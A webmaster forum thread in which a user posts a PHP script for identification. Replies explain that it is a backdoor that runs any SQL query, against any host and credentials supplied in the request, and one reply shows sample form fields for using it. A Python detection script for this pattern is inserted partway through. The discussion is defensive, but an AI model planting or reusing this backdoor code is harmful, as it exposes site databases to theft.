#1 |
Confirmed User
Industry Role:
Join Date: Jul 2003
Location: Neural Network
Posts: 855
|
programmers alert: identify this php code please
tell me what this code is supposed to do:
```php
<?php
if (ini_get('register_globals') != '1') {
    /* We'll register the variables as globals: */
    if (!empty($HTTP_POST_VARS)) extract($HTTP_POST_VARS);
    if (!empty($HTTP_GET_VARS)) extract($HTTP_GET_VARS);
    if (!empty($HTTP_SERVER_VARS)) extract($HTTP_SERVER_VARS);
}
$lnk = mysql_connect($host,$user,$pass);
echo "<hr>Begin\n";
if ($query) {
    $testquery = stripslashes($query);
    mysql_select_db($database, $lnk);
    $result = mysql_query($testquery) or die("Query failed : " . mysql_error());
    while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {
        foreach ($line as $col_value) {
            echo "$col_value\t";
        }
        echo "\n";
    }
}
die ("<hr>End");
?>
```
__________________
|
#2 |
Confirmed User
Join Date: Oct 2002
Posts: 252
|
It checks firstly if register_globals is set, if not, it programmatically sets it so that query/POST variables are set to normal variables.
It then connects to the host specified in the parameters and executes the query specified in the parameters and returns the result set from it. Ultimately, it's to execute a query on a specified host remotely. |
#3 |
So Fucking Banned
Join Date: Jan 2005
Location: At My Desk
Posts: 2,904
|
php coders
looks like it needs 3 more php coders to remove the redundancy problem the first php coder created
#4 |
Damn Right I Kiss Ass!
Industry Role:
Join Date: Dec 2003
Location: Cowtown, USA
Posts: 32,409
|
It is basically a backdoor directly into your mysql...
|
#5 |
Confirmed User
Join Date: Feb 2004
Posts: 392
|
Delete it!!
Whatever it's used for ... it's one big backdoor ...
#6 |
Confirmed User
Join Date: Feb 2002
Location: ICQ: 251425 Fr/Au/Ca
Posts: 6,863
|
There's a lot of redundant code to pass a query straight to your database.
Bad, bad, bad. |
#7 |
Confirmed User
Join Date: May 2002
Location: MI
Posts: 1,827
|
As everyone else has said, it looks to see if it registers the variables globally (i.e., takes a query string like ?info=123123 and sets it to $info automatically). If not, the extract function does so, then he is connecting to a db (and could easily pass $user, $pass, $host variables to connect right to your database, same with a $query string), for example:

He could send a post request with the variables needed..

```html
<input type="user" value="mysql_username">
<input type="pass" value="mysql_pass">
<input type="host" value="mysql_host">
<input type="query" value="SELECT * FROM your_users_table">
```

It would then return all your data in a tab delimited format when he submitted it. It is a HUGE backdoor to your db and to ANY db on your system as long as he has a user/pass for it. For that matter it could access any DB in the world as long as it was allowing your host to connect to the remote DB. It could even be used to hide their tracks if they were a hacker. Throw that on someone else's server and use it to gain access to another person's db so they don't track it down. It's just an all around BAD script.
__________________
Latest MMA news. http://www.mmawrapup.com |
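A triage check for the pattern the replies above describe, as an added example that is not part of the thread: it flags PHP source where the arguments to `mysql_connect`, `mysql_select_db` or `mysql_query` trace back to variables the file never sets itself, and notes whether `extract()` is run on request arrays. The names `scan_php` and `unset_roots` are made up for this sketch, and `SAMPLE` is an excerpt of the script from the first post.

```python
import re

# Request-controlled arrays whose keys extract() turns into plain variables.
REQUEST_ARRAYS = r"\$(?:HTTP_(?:POST|GET|COOKIE)_VARS|_(?:POST|GET|REQUEST|COOKIE))\b"
EXTRACT_RE = re.compile(r"\bextract\s*\(\s*" + REQUEST_ARRAYS)
# A database call plus the rest of its statement (up to the next ';').
DB_CALL_RE = re.compile(r"\b(mysqli?_(?:connect|select_db|query))\s*\(([^;]*)")
ASSIGN_RE = re.compile(r"\$(\w+)\s*=(?![=>])([^;]*)")
VAR_RE = re.compile(r"\$(\w+)")

# Constructed sample: excerpt of the script quoted in the first post.
SAMPLE = r"""<?php
if (!empty($HTTP_POST_VARS)) extract($HTTP_POST_VARS);
if (!empty($HTTP_GET_VARS)) extract($HTTP_GET_VARS);
$lnk = mysql_connect($host,$user,$pass);
if ($query) {
  $testquery = stripslashes($query);
  mysql_select_db($database, $lnk);
  $result = mysql_query($testquery) or die("Query failed : " . mysql_error());
}
?>"""

def unset_roots(name, assigned, seen=None):
    """Trace a variable back to the names this file never assigns."""
    seen = set() if seen is None else seen
    if name in seen:
        return set()
    seen.add(name)
    if name not in assigned:
        return {name}  # never set in this file, so request input can supply it
    roots = set()
    for dep in assigned[name]:
        roots |= unset_roots(dep, assigned, seen)
    return roots

def scan_php(source):
    """Return DB calls whose arguments come from variables the file never sets."""
    assigned = {}
    for name, rhs in ASSIGN_RE.findall(source):
        assigned.setdefault(name, set()).update(VAR_RE.findall(rhs))
    findings = []
    for func, args in DB_CALL_RE.findall(source):
        roots = set()
        for var in VAR_RE.findall(args):
            roots |= unset_roots(var, assigned)
        if roots:
            findings.append((func, sorted(roots)))
    return {"extracts_request": bool(EXTRACT_RE.search(source)), "db_calls": findings}

if __name__ == "__main__":
    print(scan_php(SAMPLE))
```

The check is a flow-insensitive regex heuristic, so treat hits as files to review by hand rather than as a verdict.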
#8 |
Confirmed User
Join Date: Aug 2003
Posts: 1,798
|
somebody wants to hump your site hehehe
__________________
TGP Webmasters: sign up for the top 100 tgp list! Submit galleries If you add me to icq (title) make sure to mention GFY or I'll think you're a bot and deny you. |
#9 |
Confirmed User
Join Date: Feb 2005
Posts: 283
|
yep, a backdoor for sure, too bad it wouldn't display the info properly though
|
#10 |
Porn Meister
Industry Role:
Join Date: Feb 2005
Posts: 16,443
|
I prefer flat files.
__________________
43-922-863 Shut up and play your guitar. |
#11 | |
Choice is an Illusion
Industry Role:
Join Date: Feb 2005
Location: Land of Obama
Posts: 42,635
|
#12 |
So Fucking Banned
Join Date: Aug 2003
Location: San Diego, CA
Posts: 5,464
|
Very stupid code, I would delete it from whatever script you found it in
|
#13 |
Confirmed User
Join Date: May 2001
Location: San Diego
Posts: 1,642
|
Before you delete it, where did you find that code?
__________________
We are what we repeatedly do.-Aristotle |
#14 |
FBOP Class Of 2013
Industry Role:
Join Date: Jan 2004
Location: bumfuck, ky
Posts: 35,562
|
looks like code from an old version of oscommerce before they did away with that register globals shit
|